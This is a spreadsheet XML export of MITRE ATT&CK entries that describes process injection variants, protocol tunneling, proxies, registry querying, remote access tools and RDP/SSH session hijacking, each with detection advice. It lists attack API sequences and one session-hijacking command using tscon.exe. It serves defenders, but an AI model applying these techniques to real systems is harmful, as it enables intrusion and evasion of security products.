    <t xml:space="preserve">Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)
Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.
Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as &lt;code&gt;WriteProcessMemory&lt;/code&gt; and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/011</t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Process: OS API Execution</t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>Process Injection: Portable Executable Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 
PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/002</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</si>
  <si>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and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>T1055.009</t>
  </si>
  <si>
    <t>Process Injection: Proc Memory</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 
Proc memory injection involves enumerating the memory of a process via the /proc filesystem (&lt;code&gt;/proc/[pid]&lt;/code&gt;) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within &lt;code&gt;/proc/[pid]/maps&lt;/code&gt; can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) 
Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/009</t>
  </si>
  <si>
    <t xml:space="preserve">File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>T1055.013</t>
  </si>
  <si>
    <t>Process Injection: Process Doppelgänging</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process. 
Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)
Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;, &lt;code&gt;VirtualProtectEx&lt;/code&gt;, and &lt;code&gt;SetThreadContext&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017)
Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):
* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.
This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/013</t>
  </si>
  <si>
    <t>Monitor and analyze calls to &lt;code&gt;CreateTransaction&lt;/code&gt;, &lt;code&gt;CreateFileTransacted&lt;/code&gt;, &lt;code&gt;RollbackTransaction&lt;/code&gt;, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to &lt;code&gt;NtCreateProcessEx&lt;/code&gt; and &lt;code&gt;NtCreateThreadEx&lt;/code&gt; as well as API calls used to modify memory within another process, such as &lt;code&gt;WriteProcessMemory&lt;/code&gt;. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)
Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>File: File Metadata, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1055.012</t>
  </si>
  <si>
    <t>Process Injection: Process Hollowing</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.  
Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as &lt;code&gt;CreateProcess&lt;/code&gt;, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as &lt;code&gt;ZwUnmapViewOfSection&lt;/code&gt; or &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;  before being written to, realigned to the injected code, and resumed via &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)
This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/012</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as &lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>T1055.008</t>
  </si>
  <si>
    <t>Process Injection: Ptrace System Calls</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. 
Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: &lt;code&gt;malloc&lt;/code&gt;) then invoking that memory with &lt;code&gt;PTRACE_SETREGS&lt;/code&gt; to set the register containing the next instruction to execute. Ptrace system call injection can also be done with &lt;code&gt;PTRACE_POKETEXT&lt;/code&gt;/&lt;code&gt;PTRACE_POKEDATA&lt;/code&gt;, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) 
Ptrace system call injection may not be possible targeting processes with high-privileges, and on some system those that are non-child processes.(Citation: BH Linux Inject) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/008</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>T1055.003</t>
  </si>
  <si>
    <t>Process Injection: Thread Execution Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. 
Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point the process can be suspended then written to, realigned to the injected code, and resumed via &lt;code&gt;SuspendThread &lt;/code&gt;, &lt;code&gt;VirtualAllocEx&lt;/code&gt;, &lt;code&gt;WriteProcessMemory&lt;/code&gt;, &lt;code&gt;SetThreadContext&lt;/code&gt;, then &lt;code&gt;ResumeThread&lt;/code&gt; respectively.(Citation: Elastic Process Injection July 2017)
This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.  
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/003</t>
  </si>
  <si>
    <t>T1055.005</t>
  </si>
  <si>
    <t>Process Injection: Thread Local Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. 
TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/005</t>
  </si>
  <si>
    <t>T1055.014</t>
  </si>
  <si>
    <t>Process Injection: VDSO Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. 
VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/014</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t xml:space="preserve">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 
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) 
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) 
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1572</t>
  </si>
  <si>
    <t>Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.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standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Proxy</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</si>
  <si>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
Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or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 (Citation: University of Birmingham C2)
Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).</t>
  </si>
  <si>
    <t>Brian Prange; Heather Linn; Walker Johnson</t>
  </si>
  <si>
    <t>T1090.004</t>
  </si>
  <si>
    <t>Proxy: Domain Fronting</t>
  </si>
  <si>
    <t>Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).
For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/004</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</t>
  </si>
  <si>
    <t>Matt Kelly, @breakersall</t>
  </si>
  <si>
    <t>T1090.002</t>
  </si>
  <si>
    <t>Proxy: External Proxy</t>
  </si>
  <si>
    <t>Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.
External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/002</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.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</si>
  <si>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T1090.001</t>
  </si>
  <si>
    <t>Proxy: Internal Proxy</t>
  </si>
  <si>
    <t>Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.
By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/001</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>Proxy: Multi-hop Proxy</t>
  </si>
  <si>
    <t>To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)
In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.  By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.  This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.  This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1090/003</t>
  </si>
  <si>
    <t>When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.
In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers.  Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization.  Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted.  Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1012</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</si>
  <si>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Interaction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring.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</si>
  <si>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Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>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allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1219</t>
  </si>
  <si>
    <t>Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.
[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</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</si>
  <si>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
Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563</t>
  </si>
  <si>
    <t>25 February 2020</t>
  </si>
  <si>
    <t>Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
Monitor for processes and command-line arguments associated with hijacking service sessions.</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking: RDP Hijacking</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment.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perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563/002</t>
  </si>
  <si>
    <t>Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.</t>
  </si>
  <si>
    <t>T1563.001</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking: SSH Hijacking</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)
[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1563/001</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>Anastasios Pingios</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1021</t>
  </si>
  <si>
